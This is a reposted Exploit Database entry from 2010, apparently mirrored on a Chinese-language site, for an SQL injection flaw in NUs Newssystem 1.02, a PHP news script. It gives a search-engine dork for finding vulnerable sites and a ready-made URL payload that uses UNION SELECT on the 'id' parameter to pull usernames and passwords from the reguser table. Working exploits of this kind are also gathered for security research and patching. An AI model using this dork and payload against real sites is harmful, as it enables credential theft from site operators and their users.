nus newssystem 1.02 – ‘id’ SQL Injection

• Exploit Database
• 134 阅读

• 作者： n3w7u
  日期： 2010-03-09
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11674/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31

  .-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-. ~ NUs Newssystem 1.02 (id) SQL Injection Vulnerability ~ .-=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-.   [+] Autor: n3w7u   [+] Page: http://www.internet-works.de/home.html   [+] Vulnerabilities [ SQL Injection ]   [+] Language: [ PHP ]   [+] Version: 1.02   [+] Dork : inurl:"?pageNum_RSnews"&view   .-=--=--=--=--=--=--=--=--=--=--=-.   [+] Vulnerability   Nus.php?pageNum_RSnews=0&id=   [+] Exploitable   http://[host]/[path]/[script].php?pageNum_RSnews=0&id=9999999+union+select+1,2,3,user,5,pass,7,8,9+from+reguser--